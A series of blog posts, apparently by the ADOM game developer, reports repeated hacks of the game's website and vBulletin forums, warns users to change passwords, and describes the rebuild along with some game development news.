The ADOM RPG website has been hacked

Please avoid it. It's redirecting to scamming sites. We are working of fixing this.

Update 10th of March 2019, 1:43pm, GMT+1: https://www.adom-rpg.com is back and safe again. If you registered there, please change your password. None of our other sites have been affected as far as we know (and they don't exchange data). https://www.ultimate-adom.com seems to be under attack from Russia right now, though, too.

Hacker attack repulsed... hopefully

As reported this morning the ADOM forums once more fell victim to some hacker attack. For now it seems that all effects have been removed. If you want to be 100% sure that nothing bad can happen to your account, you might want to change your password. No signs of database manipulation could be found but just to be on the safe side this might be a good idea.

The forum software has been updated and luckily this time the issue tracker did no break, so everything should be find. If you notice anything unusual please let me know and I'll try to take care of it as soon as possible.

Now back to routine... I'm looking forward to the feedback and bug reports concerning the latest release!

www.adom.de/forums hacked once more :-(

Very bad start for the new idea: It seems that www.adom.de/forums (at least) got hacked once more. When I entered the site this morning an applet asked for permission to do "something" on my local computer. There seems to have been code injected into the forum software (once again), here's the piece of code responsible for the problem on the page itself:

Naturally you never should allow that access. Please be careful and refrain from using the forums for now until we know better what has happened. Needless to say that this once more is a major setback for me as it took days and days last time to sort that stuff out and I fear for the worst :-(


Needless to say that many thoughts of exterminating those f**** hackers currently are crossing my mind.

Back to normal: More undead to the game

Since the hacker incursion finally has been repelled I'm quickly trying to get back to the normal schedule. At the weekend I was interrupted adding shadows to the game (and ghosts and spectres being the next) which introduce attribute drain as a new special ability. This new ability opens up so much room for cool new items that all the PC to drain monster attributes (gauntlets of the shadow touch draining strength, vampiric blades draining toughness, weapons of sorrow draining charisma, etc.) that I love this new addition.

Forums survived the night... hacker attack finally repelled?

No new garbage appearing on the adom.de server overnight. Finally we might have managed to quench all the damage inflicted by the script kiddie attack. I'm picking up hope again and maybe soon things can return to normal... specifically I hope to recover the fun I had working on JADE in the past couple of weeks. Stay tuned...

Hacking aftermath: Forums down again :-(

And yet another hole found, data destroyed, files damaged and the forums down again. I wish I'd be able to get my hands on this cowardly hacker freak... he'd suffer some real pain :-(

I'm not sure when (or if) things will be back up soon - I'll make one more attempt to save stuff tonight but I'm slowly getting tired of reinstallating the forums. And reconfiguring them... which really is a pain in the ass with vBulletin due to the immense amount of features... configuring those just takes too long.

Oh well, dark times for ADOM and JADE. So much time and energy lost...

Right now I am rebuilding the forums. In order to have a good feeling about that for the future I decided to invest in a new vBulletin software license for $175. As a consequence of that I also decided to add a new donation options via Moneybookers (see the support sidebar to the right).

Thanks for all current donators - part of your money thus was used for improving the official forums.
